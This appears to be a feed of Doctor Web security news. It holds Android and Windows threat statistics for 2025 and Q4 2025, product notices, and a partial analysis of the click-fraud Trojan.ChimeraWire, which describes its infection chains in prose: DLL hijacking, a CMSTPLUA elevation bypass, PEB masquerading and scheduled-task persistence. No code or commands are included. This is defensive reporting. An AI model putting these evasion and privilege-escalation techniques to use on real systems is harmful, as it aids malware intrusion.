According to the detection statistics provided by Dr.Web Security Space for mobile devices, in 2025, the share of banking trojans, out of the total number of malicious apps registered, was 6.94%, which is slightly more than the 6.29% figure from the year before. During the first three months, banking trojan activity remained at approximately the same level, but at the beginning of the second quarter, it significantly increased. After that, it began to gradually decline, reaching the annual minimum in July. From August onwards, the number of detections began to grow again, peaking in October. At the end of the year, another decline was observed.

In 2025, threat actors continued using a number of popular banking trojan families to carry out their attacks. Among the most active were the malicious apps Android.Banker.Mamont, Coper, Android.BankBot.Ermac, and some others. Moreover, new versions of NGate trojans were found. These trojans use NFC technology to steal money. They send data from the NFC chip of infected devices to the attackers, allowing fraudsters to withdraw money from victims’ accounts at ATMs or make purchases using contactless payment without further user involvement. Among the most active were modifications like Android.Banker.NGate.8, Android.Banker.NGate.17, and Android.Banker.NGate.5.origin.

Android.SpyMax, malicious apps with spyware functionality, continued to be distributed. These trojans are based on leaked source code of the SpyNote RAT trojan. Cybercriminals use them in a variety of scenarios, including as banking trojans. At the same time, compared to 2024, the activity of Android.SpyMax malware decreased. These trojans accounted for 12.35% of banking trojan detections, compared to 32.04% the year before.

In 2025, Russian users were most likely to encounter various banking trojans belonging to the extensive Mamont family, as classified by Doctor Web (e.g., Android.Banker.790.origin, Android.Banker.Mamont.3.origin, and Android.Banker.Mamont.28.origin). This family includes different malicious apps that malware creators continue to actively modify and develop. These apps intercept SMS containing one-time codes from credit organizations and steal bank card data and other confidential information.

Throughout the year, our experts observed the activity of banking trojans targeting users from Uzbekistan and neighboring countries, including Armenia, Azerbaijan, and Kyrgyzstan. Trojans like Android.Banker.951.origin, Android.Banker.881.origin, and Android.Banker.963.origin were most frequently detected on protected devices. They hijack verification codes from SMS coming from banks. Cybercriminals constantly modify such trojans to make it harder for them to be detected. Turkish users were most often attacked by the Android.BankBot.Coper.12.origin, Android.Banker.5685, and Android.Banker.864.origin banking trojans, which are also capable of stealing the contents of SMS.

At the same time, Iranian residents encountered the trojans Android.BankBot.1190.origin and Android.BankBot.1191.origin and modifications of them. These malicious programs steal banking information from SMS, finding data about the victim’s bank cards, accounts, available funds, completed transactions, etc., and then send it to the attackers. They also collect contact information from the phone book and can send SMS on the attackers’ command.

Users from many Southeast Asian and the Asia-Pacific region countries, including Indonesia and South Korea, were attacked by the Android.BankBot.Remo.1.origin trojan. This malicious program utilizes the Accessibility Services of the Android OS to steal data from bank software and crypto wallets installed on infected devices. In addition to the Remo trojan, users in South Korea also encountered such trojans as Android.BankBot.15140, Android.BankBot.Ermac.6.origin, and GoldDigger (Android.BankBot.GoldDigger.9, Android.BankBot.GoldDigger.11).

The GoldDigger malware was also used to attack Indonesian and Thai users. And the banking trojan Android.BankBot.Gigabud.1.origin was used against customers of credit organizations in Indonesia and Malaysia. At the same time, threat actors continued to use MoqHao trojans in attacks on Japanese audiences. The most widely used MoqHao modifications included Android.Banker.672.origin, Android.Banker.5063, Android.Banker.740.origin, and a number of others.

One banking trojans targeting users in India was Android.Banker.6209. This trojan imitates the appearance of genuine banking software to steal victims’ data, including their names, bank card numbers and CVV security codes. In addition, RewardSteal banking trojans, such as Android.Banker.814.origin, Android.Banker.913.origin, and Android.Banker.5132, continued to be active. To steal banking data, they are camouflaged as software that appears to be backed by large Indian credit organizations, for example, ICICI, SBI, Axis, and PM Kisan.

Android device owners in Brazil were most frequently attacked by Android.BankBot.1183.origin malicious apps and some members of the NGate family, like Android.Banker.NGate.8, Android.Banker.NGate.9, and Android.Banker.NGate.14.

In 2025, malware creators continued utilizing different techniques to protect Android banking trojans from analysis and detection. For instance, various code obfuscation and concealment methods were popular, such as DEX to C (which involves converting executable DEX code into C programming language code). Another widespread solution that was employed involved obfuscating malicious apps with the NP Manager utility.

Techniques involving manipulating the format of ZIP archives, which are essentially APK files of Android apps, remain popular. These include manipulating the compression method and compressed size fields in the header structure of the local file inside the APK, and also using incorrect disk data in ECDR and CD records. We covered these techniques in more detail in our previous review, in the section dedicated to banking trojans. After such manipulations, trojan apps remain fully functional, but many static analysis instruments perceive them as damaged and are unable to process them correctly.

Malware creators have increased their use of dropper programs to conceal their main payload in order to, for example, bypass the internal protection on Google Play. Cybercriminals are also using AI assistants when writing banking trojan code, which simplifies the malware-development process and leads to the emergence of new families. Moreover, threat actors are increasingly using Telegram bots to control banking trojans and exfiltrate data from infected devices.

Prospects and trends

In 2025, we observed high activity on the part of ad-displaying trojans, which remain the most common threats targeting the Android OS. Various fake programs used for fraudulent purposes, including phishing and money theft, were also widespread again. In addition, the number of attacks involving banking trojans continued to increase. All of these malicious apps are a source of illegal income for cybercriminals, which is why their popularity remains high. In 2026, they are highly likely to once again be one of the most popular money-making tools for cybercriminals. Meanwhile, malware creators are increasingly using Telegram bots to control banking trojans. This trend is likely to continue.

The emergence of Android.Clipper.31 malware and new versions of the Android.Vo1d and Android.Triada trojans in the firmware of smartphones and TV box sets indicates the continued interest of attackers in distributing malware in ways that significantly complicate its detection. It is likely that this trend will continue in the new year and that we will see more cases of malicious programs being pre-installed on smartphones, TV box sets, and other types of Android devices.

We should also expect that more sophisticated malicious apps, ones capable of performing a wider range of tasks, will emerge. These could be yet other backdoors and various spyware trojans. Moreover, malware creators will likely use official app catalogs, including Google Play, to distribute malware and unwanted software.

Threat actors will also continue implementing various protection methods for the instruments they create. They will also use AI assistants more often when writing code, which will lead to the emergence of more new families.

Doctor Web monitors the threat landscape in the mobile segment and promptly responds to emerging challenges. We recommend to Android users that they install Dr.Web Security Space for mobile devices to protect themselves from malicious and other dangerous programs.

Indicators of compromise

Doctor Web’s Q4 2025 review of virus activity on mobile devices

Mon, 12 Jan 2026 00:00:00 GMT

January 12, 2026

According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans Android.MobiDash and Android.HiddenAds, which display intrusive ads, were again the most widespread Android threats. At the same time, their activity decreased, and they were detected less frequently on protected devices by 43.24% and 18.06%, respectively. These malicious programs were followed by trojans from the Android.Siggen family, which includes malware whose functionality varies. They were also detected less often—by 27.47%.

At the same time, noticeable banking trojan activity was observed, with users encountering them 65.52% more frequently. This growth was largely due to members of the Android.Banker family. Such malicious programs intercept SMS with one-time codes for confirming banking transactions and can also imitate the appearance of legitimate bank software and display phishing windows.

Android apps modified with the CloudInject cloud service (Dr.Web anti-virus detects them as Program.CloudInject) were the most widespread unwanted software. CloudInject adds dangerous system permissions to the apps and obfuscated code, while the purpose of that code cannot be controlled. Program.FakeAntiVirus (fake anti-viruses) and Program.FakeMoney (apps) were also commonly found on protected devices. The former detect non-existing threats and ask users to purchase the full version to “cure” the infection, while the latter allegedly allow users to make money by completing various tasks.

The most widespread riskware programs in Q4 were Tool.NPMod apps, programs modified using the NP Manager utility. This tool obfuscates the code of the modified apps and adds a special module to them that allows digital signature verification to be bypassed once applications are modified. Among the adware detections, members of the Adware.Adpush family retained their lead. These are special software modules that developers integrate into apps to display notifications containing advertisements.

In October, our specialists informed users about the dangerous backdoor Android.Backdoor.Baohuo.1.origin. Threat actors embedded it into unofficial Telegram X messenger modifications and distributed it through malicious websites and third-party Android app catalogs. This malware steals logins and passwords for Telegram accounts as well as other confidential data. Moreover, with its help, threat actors can practically control the victim’s account and covertly perform various actions in the messenger on their behalf. For example, the attackers can join Telegram channels and leave them, conceal new authorized devices, conceal certain messages, etc. Malicious actors use several control mechanisms to operate Android.Backdoor.Baohuo.1.origin. One of them is the Redis database, which has not been seen previously in Android threats. In total, this backdoor infected around 58,000 devices, including about 3,000 different models of smartphones, tablets, TB box sets, and cars with on-board Android-based computers.

Over the past quarter, Doctor Web’s anti-virus laboratory discovered new malware on Google Play. Among these programs were Android.Joker trojans, which subscribe victims to paid services, and various Android.FakeApp fake programs, which are used in fraudulent schemes. They had at least 263,000 downloads combined.

PRINCIPAL TRENDS OF Q4 2025

Ad-displaying trojans remain the most widespread Android threats
The number of banking trojan attacks increased
Malicious actors distributed the dangerous backdoor Android.Backdoor.Baohuo.1.origin, which was built into Telegram X messenger modifications
More malicious programs emerged on Google Play

According to statistics collected by Dr.Web Security Space for mobile devices

Android.MobiDash.7859: A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.
Android.FakeApp.1600: A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.
Android.Click.1812: The detection name for malicious WhatsApp messenger mods that can covertly load various websites in the background.
Android.Packed.57.origin: The detection name for an obfuscator that is used to protect apps, including malicious ones (for example, some Android.SpyMax banking trojan versions).
Android.Triada.5847: The detection name for a packer for Android.Triada trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with the malicious Telegram messenger mods in which these trojans are embedded.

Program.CloudInject.5
Program.CloudInject.1: The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as Tool.CloudInject). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.
Program.FakeAntiVirus.1: The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.
Program.FakeMoney.11: The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.
Program.SnoopPhone.1.origin: An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin: The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.
Tool.LuckyPatcher.2.origin: A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to a shared database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.
Tool.Androlua.1.origin: The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.

Adware.AdPush.3.origin
Adware.Adpush.21846: Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.
Adware.Bastion.1.origin: The detection name for optimization programs that periodically create notifications with misleading messages about allegedly low storage and “system errors” in order to display ads during the “optimization”.
Adware.Airpush.7.origin: Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.
Adware.ModAd.1: The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.

Threats on Google Play

Over the course of Q4 2025, Doctor Web’s virus analysts detected over 20 Android.Joker malicious programs on Google Play. These are designed to subscribe users to paid services; Threat actors camouflaged them as various software: messengers, system optimization tools, image-editing apps, and apps that allow users to watch movies.

Examples of Android.Joker malicious apps that were detected. Android.Joker.2496 masqueraded as Useful Cleaner, a tool for clearing out “junk” from the phone, and one of the Android.Joker.2495 modifications was passed off as the movie player Reel Drama

Our experts also discovered several new fake programs from the Android.FakeApp family. As before, some of them were distributed as financial apps and were designed to load fraudulent websites. Other fakes were passed off as games. Under certain conditions (for instance, if a user’s IP address met the attackers’ requirements), they could load bookmaker and online casino sites.

The Chicken Road Fun game was the fake app Android.FakeApp.1910. It could open an online casino website instead of providing the declared functionality

To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.

Indicators of compromise

Doctor Web’s Q4 2025 virus activity review

Mon, 12 Jan 2026 00:00:00 GMT

January 12 2026

According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the fourth quarter of 2025 increased by 16.05%, compared to the third quarter. The number of unique threats decreased by 1.13%. Most common were unwanted adware apps, malicious scripts, and various malicious programs, including downloaders and ad-displaying trojans.

In email traffic, trojan apps—like downloaders, password stealers, and droppers—were most frequently detected. Moreover, exploits, backdoors, and various malicious scripts were also distributed via email.

Users whose files were affected by encoder trojans had mostly encountered Trojan.Encoder.35534, Trojan.Encoder.41868, and Trojan.Encoder.29750.

In October, we informed users about the Android.Backdoor.Baohuo.1.origin backdoor, which cybercriminals were distributing in modified versions of the Telegram X messenger. This malicious program steals logins and passwords for Telegram accounts as well as other sensitive data. Using this backdoor, threat actors can control the victims’ hacked accounts and also gain full control over the messenger itself, performing various actions on behalf of users.

In November, our anti-virus laboratory released a study of a targeted attack carried out by the Cavalry Werewolf hacker group on a Russian state institution. During the examination, Doctor Web’s experts identified many of the malicious instruments being used by the threat actors, including open-source tools that cybercriminals utilize in their campaigns. Our specialists also studied the features of this hacker group and the actions it typically takes in compromised networks.

Already in December, we published information about the unique trojan dubbed Trojan.ChimeraWire, which artificially increases the popularity of websites. To do so, it pretends to be a human so that its actions are not blocked by the anti-bot protection of the sites. The malicious program automatically searches target websites in search engines, opens them, and performs clicks on their webpages in accordance with the parameters received from the malicious actors. Trojan.ChimeraWire infects computers with the help of several malicious programs that exploit DLL Search Order Hijacking class vulnerabilities and also utilize anti-debugging techniques to avoid detection.

Over the course of Q4, Doctor Web’s Internet analysts identified new fraudulent websites that promised potential victims quick and easy money. More phishing sites and fake marketplace Internet resources were also found.

Our specialists uncovered yet more malicious apps on Google Play. Among them were Android.Joker trojans, which subscribe Android device owners to paid services, as well as Android.FakeApp malicious apps, which are used by cybercriminals to implement various fraudulent schemes. At the same time, Dr.Web Security Space for mobile devices detection statistics revealed that Android banking trojans increased their activity.

Principal trends in Q4 2025

The number of threats detected on protected devices increased
The number of unique threats used in attacks decreased
More users requested help to decrypt files affected by encoder trojans
Banking trojans targeting Android device owners were more active
Threat actors distributed the Android.Backdoor.Baohuo.1.origin backdoor, which hacks the Telegram accounts of Android users
New malicious apps emerged on Google Play

According to Doctor Web’s statistics service

The most common threats in Q4 2025:

Trojan.Siggen31.34463: A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at %appdata%\utorrent\lib.dll. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.
Adware.Downware.20091: Adware that often serves as an intermediary installer of pirated software.
VBS.KeySender.7: A malicious script that, in an infinite loop, searches for windows containing the text mode extensions, разработчика, and розробника and sends them an Escape key press event, forcibly closing them.
Trojan.BPlug.4268: The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.
Adware.Siggen.33379: A fake Adblock Plus browser ad blocker that is installed on the system by other malware to display advertisements.

Statistics for malware discovered in email traffic

The most common threats in email traffic in Q4 2025:

W97M.DownLoader.2938: A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.
Trojan.AutoIt.1413: The detection name for a packed version of the Trojan.AutoIt.289 malicious app, written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. Trojan.AutoIt.289 performs various malicious actions that make it difficult for the main payload to be detected.
JS.Phishing.791: A malicious JavaScript script that generates a phishing web page.

Encryption ransomware

In Q4 2025, the number of requests made to decrypt files affected by encoder trojans increased by 1.15%, compared to Q3 2025.

The dynamics of the decryption requests received by Doctor Web’s technical support service:

The most common encoders of Q4 2025:

Trojan.Encoder.35534 — 24.90% of user requests
Trojan.Encoder.41868 — 4.21% of user requests
Trojan.Encoder.29750 — 3.42% of user requests
Trojan.Encoder.26996 — 2.68% of user requests
Trojan.Encoder.30356 — 0.38% of user requests

Network fraud

Over the course of Q4 2025, Doctor Web’s Internet analysts observed the emergence of new fake marketplace websites. Fraudsters, allegedly on behalf of online trading platforms, offer potential victims the opportunity to play a carousel-type game (similar to roulette) with the chance of winning a prize. After several attempts, the user “gets lucky”, but to receive the prize, they are supposedly required to pay first for the shipping, then insurance, some taxes, etc. In some cases, the victim is told that the item in question is allegedly unavailable and is offered the chance to exchange it for money. If the user agrees, they are again asked to make some more payments in the form of insurance, some account activation, etc.

Example of a fake marketplace website offering a “prize drawing”

More Internet resources on which scammers sell non-existent theater tickets were added to our unwanted and malicious websites database. Such sites offer victims the chance to attend popular theatrical performances, often at attractive prices. However, after victims pay, they do not get the tickets and have essentially given their money away to the fraudsters.

One of the fraudulent sites that sells non-existent theater tickets

Other sites that imitate the websites of private cinemas and offer users a chance to buy movie tickets have also been detected. Victims do not receive any tickets after paying for them on such sites.

The fake website of a private cinema

Our specialists detected several phishing web resources with some of them being fake sites of the Steam platform. Malicious actors used them to obtain user account data by asking potential victims to provide a login and password for authentication.

A phishing website that imitates the real Steam Internet portal and asks potential victim to log into their account

In addition, scammers again lured potential victims into non-existent investment projects. One of the detected sites invited Russian-speaking users living in America to invest $250 in a project called Federal Invest with the chance to “make up to 90,000 dollars in 3 months”. This project was allegedly created with the participation of Donald Trump.

A fraudulent site offering the chance to join a “profitable investment project”

Another website reported that Uzbek users can achieve an income of at least 15,000,000 Uzbek soums already within the first month of joining the advertised project, which is allegedly related to a large holding company.

A fraudulent website promising residents of Uzbekistan some large profits by joining the “investment project”

Find out more about Dr.Web non-recommended sites

Malicious and unwanted programs for mobile devices

According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q4 2025, the ad-displaying trojans Android.MobiDash and Android.HiddenAds remained the most common Android threats, despite a decline in their activity. Malicious programs that belong to the Android.Siggen family and have various functionality rose to third place. Over the course of last three months, banking trojan activity increased, with the Android.Banker family showing the greatest growth.

Program.CloudInject apps, modified via the CloudInject cloud service, were the most common unwanted software. Among the potentially dangerous programs, or riskware, the most active were Tool.NPMod apps, which had been modified using the NP Manager utility. The most commonly detected adware programs were Adware.Adpush modules that developers embed into Android apps.

In October, Doctor Web released a report on Android.Backdoor.Baohuo.1.origin, a dangerous backdoor that threat actors embedded into Telegram X messenger modifications. This malware steals confidential information and allows the attackers to control both the victim's account and the messenger itself by changing its operating logic.

During the fourth quarter, our virus analysts discovered new threats on Google Play, including Android.Joker trojans, which subscribe users to paid services, and Android.FakeApp malicious apps, which are used for fraudulent purposes.

The following Q4 2025 events involving mobile malware are the most noteworthy:

Adware trojans remained the most common Android threats.
Android.Banker banking trojan activity increased.
The dangerous backdoor Android.Backdoor.Baohuo.1.origin was found in a third-party Telegram X messenger mods.
New malicious programs emerged on Google Play.

To find out more about the security-threat landscape for mobile devices in Q4 2025, read our special overview.

We’ve updated Dr.Web FixIt!’s End User License Agreement!

Mon, 29 Dec 2025 13:33:13 GMT

Dr.Web FixIt!’s End User License Agreement has been updated. The latest EULA version is available at https://license.drweb.com/agreement

Dr.Web FixIt! allows information security experts to conduct in-depth analyses of Windows PCs and servers remotely, neutralise identified threats, and resolve potential vulnerabilities. It is distinguished for its ability to detect brand-new malware, including malicious programs that perpetrators use in targeted attacks and can’t be identified by other cybersecurity tools.

Dr.Web FixIt! is primarily designed for information security professionals tasked with monitoring IT infrastructures and analysing cybersecurity incidents. However, even if a company doesn't employ an actual SOC team, the solution can still be used to identify threats on desktops, laptops and/or servers, and eliminate them.
If necessary, our experts will help you analyse the data gathered by Dr.Web FixIt! To get additional assistance and expertise from Doctor Web, you will need to purchase an expert support certificate.

You can purchase a Dr.Web FixIt! license from Doctor Web's partners.

A major centralised administration server update for Dr.Web Enterprise Security Suite and Dr.Web Industrial

Fri, 12 Dec 2025 11:13:26 GMT

Doctor Web is rolling out a major server component update for Dr.Web Enterprise Security Suite and Dr.Web Industrial 13.0.1.202511120 that will become available on December 15, 2025. The biggest change being introduced is for the Application Control component to further improve the security of protected devices.

The update package will also deliver other tweaks and feature upgrades. Those include additional functional analysis criteria for Dr.Web Enterprise Security Suite and Dr.Web Industrial:

In the “Application launch” category, Dr.Web can be set to stop office suite programs and mail clients from creating child processes. This can reduce the risk of infection via malicious documents and emails without interfering with the user experience.
In the “Launch of script interpreters” category, new rules are available to prevent scripts from being run from office suite apps and email clients and to block certain AutoIt, JavaScript and Python scripts. These restrictions will protect systems from cyberattacks that leverage script interpreters and help prevent dubious automation routines from being created.
The “Driver loading” category can now be used to prevent non-WHQL drivers from being installed. This option ensures that unsigned modules can't be used and potentially dangerous code won't be loaded into the kernel.

The updated set of rules provides cybersecurity administrators with additional flexible tools for preventing malicious activity and increasing their infrastructure’s resilience in the face of modern threats.
The update also addresses a number of identified issues, which include:

A Dr.Web server update error that could occur in systems with limited CPU and memory capacity.
An issue preventing the repository product “Content filter databases for UNIX” from being updated if the “Update only bases” option was enabled in the Control Center’s Update restrictions section.
Possible interference with routine DNS response cache updating.

A detailed changelog is available here.

Bellerophon could never have imagined. The ChimeraWire trojan boosts website popularity by skillfully pretending to be human

Mon, 08 Dec 2025 05:00:00 GMT

Download PDF

December 8, 2025

Introduction

While analyzing one of the affiliate programs, Doctor Web’s experts discovered a unique piece of malware with clicker functionality and dubbed it Trojan.ChimeraWire. This malware targets computers running Microsoft Windows and is based on the open-source projects zlsgo and Rod for automated website and web application management.

Trojan.ChimeraWire allows cybercriminals to simulate user actions and boost the behavioral factor of websites by artificially increasing their rankings in search engine results. For this, the malicious app searches target Internet resources in the Google and Bing search engines and then loads them. It also imitates user actions by clicking links on the loaded sites. The trojan performs all malicious actions in the Google Chrome web browser, which it downloads from a certain domain and then launches it in debug mode over the WebSocket protocol.

Trojan.ChimeraWire gets onto computers with the help of several malicious downloaders. They utilize various privilege escalation techniques based on exploiting DLL Search Order Hijacking vulnerabilities, as well as anti-debugging techniques, in order to avoid detection. Our anti-virus laboratory has tracked at least 2 infection chains involving these malicious programs. In one of them, the malicious script Python.Downloader.208 takes center stage. In the other—the centerpiece is Trojan.DownLoader48.61444, whose operating principle is similar to that of Python.Downloader.208; in fact, this downloader is an alternative to the malicious script.

In this study, we will cover the features of Trojan.ChimeraWire and the malicious apps that deliver it to users’ devices.

First infection chain

A scheme that illustrates the first infection chain

The first infection chain starts with Trojan.DownLoader48.54600. This malware verifies whether it is operating in an artificial environment and terminates if it detects signs of a virtual machine or the debug mode. If no such signs exist, the trojan downloads the ZIP archive python3.zip from the C2 server. It contains the malicious script Python.Downloader.208 along with some additional files that it needs to operate, e.g., the malicious library ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 extracts the archive and runs the script. The latter is the second infection stage and represents the downloader that receives the next stage from the C2 server.

Python.Downloader.208’s behavior depends on the rights it has when executed. If the script is running without administrator privileges, it tries to obtain them. For this, Trojan.Starter.8377 (extracted along with it) is copied to the directory %LOCALAPPDATA%\Microsoft\WindowsApps. Moreover, a script runs.vbs is created that will later be used to re-launch Python.Downloader.208.

Next, Python.Downloader.208 launches the system app %SystemRoot%\SysWOW64\iscsicpl.exe. Because a DLL Search Order Hijacking class vulnerability is present in it, it automatically loads the trojan library ISCSIEXE.dll, whose name matches the name of a legitimate Windows component.

In turn, Trojan.Starter.8377 runs the VBS script runs.vbs, which then executes Python.Downloader.208 again, but already as administrator.

When executed with the necessary privileges, Python.Downloader.208 downloads the password-protected archive onedrive.zip from the C2 server. It contains the next infection stage, which is the Trojan.DownLoader48.54318 (it comes as the library UpdateRingSettings.dll), and the additional files required for it to operate (for instance, the legitimate app OneDrivePatcher.exe, which is part of the OneDrive software from the Windows OS and has a valid digital signature).

After extracting the archive, Python.Downloader.208 creates a System Scheduler task for running the app OneDrivePatcher.exe at system boot. Next, it launches this program. Because it has a DLL Search Order Hijacking vulnerability, the app automatically loads the malicious library UpdateRingSettings.dll, whose name matches the name of the OneDrive software component.

Once Trojan.DownLoader48.54318 gains control, it checks whether it has launched in an artificial environment. If it detects any sign that it is operating on a virtual machine or in debug mode, it terminates.

If such signs are not detected, the trojan library tries to download the payload from the C2 server as well as the keys for its decryption.

The decrypted payload is a ZLIB container with a shellcode and an executable file. After decrypting the container, Trojan.DownLoader48.54318 tries to unpack it. If it fails to do so, the trojan deletes itself and terminates its active process. If the unpacking is successful, control is handed to the shellcode, whose task is to unzip the executable that comes with it. This file represents the final infection stage, which is the target trojan Trojan.ChimeraWire.

Second infection chain

The second stage starts with the Trojan.DownLoader48.61444 malware. When launched, it verifies whether it has administrator rights and tries to obtain them if they are missing. The trojan uses the Masquerade PEB technique to bypass the security system, disguising itself as a legitimate process explorer.exe.

Next, it patches the copy of the system library %SystemRoot%\System32\ATL.dll. To do so, Trojan.DownLoader48.61444 reads its contents, adds a decrypted bytecode to it along with the path to the trojan’s file, and then saves the modified copy as the file dropper in the same directory where it is located. After that, the trojan initializes the COM model objects of the Windows Shell for the service %SystemRoot%\System32\wbem and the modified library. If this initialization is successful, Trojan.DownLoader48.61444 tries to obtain administrator rights by using the CMSTPLUA COM interface, exploiting a vulnerability that is typical for some old COM interfaces.

If successful, the modified library dropper is copied to the directory %SystemRoot%\System32\wbem as the file ATL.dll. After that, Trojan.DownLoader48.61444 launches the Windows Management Instrumentation WmiMgmt.msc. As a result, a DLL Search Order Hijacking vulnerability is exploited in the system app mmc.exe, and it automatically loads the patched library%SystemRoot%\System32\wbem\ATL.dll. In turn, this library launches the Trojan.DownLoader48.61444 again, but this time—with administrator rights.

A scheme illustrating Trojan.DownLoader48.61444’s operation when administrator rights are not available

When running as administrator, Trojan.DownLoader48.61444 executes several PowerShell scripts for downloading the payload from the C2 server. One of the downloading objects is the ZIP archive one.zip. It contains the same files as in the archive onedrive.zip from the first infection chain (particularly, the legitimate app OneDrivePatcher.exe and the malicious library UpdateRingSettings.dll, which is Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 extracts the archive and creates a System Scheduler task for running OneDrivePatcher.exe at system boot. The trojan also launches this app. Just like in the first chain, a DLL Search Order Hijacking vulnerability is exploited in OneDrivePatcher.exe upon its launch, and the trojan library UpdateRingSettings.dll is automatically loaded. After that, the infection chain repeats the first scenario.

At the same time, Trojan.DownLoader48.61444 also downloads the second ZIP archive two.zip. It contains the malicious script Python.Downloader.208 (update.py) as well as the files necessary for its execution. Among them is Guardian.exe, which is a renamed pythonw.exe consol interpreter for the Python language.

After extracting the archive, Trojan.DownLoader48.61444 creates a System Scheduler task for launching Guardian.exe at system boot. Moreover, it directly executes the malicious script Python.Downloader.208 through this app.

By partially duplicating the first infection chain, threat actors apparently sought to increase the likelihood of successfully downloading Trojan.ChimeraWire onto target systems.

A scheme illustrating Trojan.DownLoader48.61444 operating with administrator rights

Trojan.ChimeraWire

Trojan.ChimeraWire got its name from combining the words “chimera”—a mythical creature with the body parts of several animals—and “wire”. The word "chimera” describes the hybrid nature of the attackers’ techniques: the use of trojan downloaders written in different programming languages as well as anti-debugging techniques and privilege escalation during the infection process. Moreover, it reflects the fact that the trojan is a combination of various frameworks, plugins, and legal software through which hidden traffic control is carried out. And this is where the second word “wire” comes from: it refers to the trojan’s invisible and malicious network operation.

Once on the target computer, Trojan.ChimeraWire downloads the archive chrome-win.zip from a third-party website. This archive contains the Google Chrome browser for Windows. It should be noted that this Internet resource also stores archives containing Google Chrome builds for other operating systems, like Linux and macOS, including those for various hardware platforms.

The website with various Google Chrome builds from which the trojan downloads the necessary archive

When the browser is downloaded, Trojan.ChimeraWire tries to covertly install the add-ons NopeCHA and Buster into it. Designed for automated CAPTCHA solving, these add-ons will be used by the malware further along in its operation.

Next, it launches the browser in the debugging mode with a hidden window, which allows malicious activity to occur without the user noticing. After that, a connection is established to the automatically selected debugging port via the WebSocket protocol.

The trojan then proceeds to obtain tasks. It sends a request to the C2 server and receives a base64 string in response. This string contains the JSON configuration encrypted with the AES-GCM algorithm.

Example of the configuration that the trojan receives from the C2 server

It contains tasks and the parameters related to them:

the target search engine (the Google and Bing search platforms are supported);
the key phrases for searching websites in the target search engine and for their consequent loading;
the maximum number of sequential transitions between webpages;
random distributions for performing automated clicks on webpages;
the wait time for loading pages;
the target domains.

To more effectively simulate the activity of a real user and bypass systems that monitor constant activity, the configuration also includes parameters responsible for pauses between work sessions.

Simulating user mouse clicks

Trojan.ChimeraWire can perform the following types of clicks:

for navigating search results;
for opening found relevant links in new background tabs.

First, using the target search engine, Trojan.ChimeraWire searches websites by the domains and key phrases specified in the configuration. It then opens the websites listed in the search results and locates every HTML element on them that defines hyperlinks. The trojan puts these elements into a data array and shuffles it so that all of the objects in it are listed in a different order than the order on the webpage. This is to bypass website anti-bot protection that can track the order of clicks.

Next, Trojan.ChimeraWire checks whether the links it has found and the strings in them match the template from the configuration, and then calculates the number of matches. Depending on this number, the malware then uses different operating algorithms.

If a sufficient number of suitable links is found on the page, Trojan.ChimeraWire scans the page and sorts the detected links by their relevance (the links that most closely match key phrases are listed first). After that, a click is performed on one or multiple suitable links.

If the number of matches with the given template are insufficient or none exist, the malware uses a probabilistic behavior model algorithm that imitates real human behavior as closely as possible. Based on the parameters from the configuration, Trojan.ChimeraWire uses a weighted distribution to determine the number of links to be opened. For example, the distribution ["1:90", "2:10"] means that the trojan will click 1 link with a probability of 90% and 2 links with a probability of 20%. Thus, the malware is highly likely to open 1 link. The trojan randomly selects the link from the data array it created earlier and performs a click.

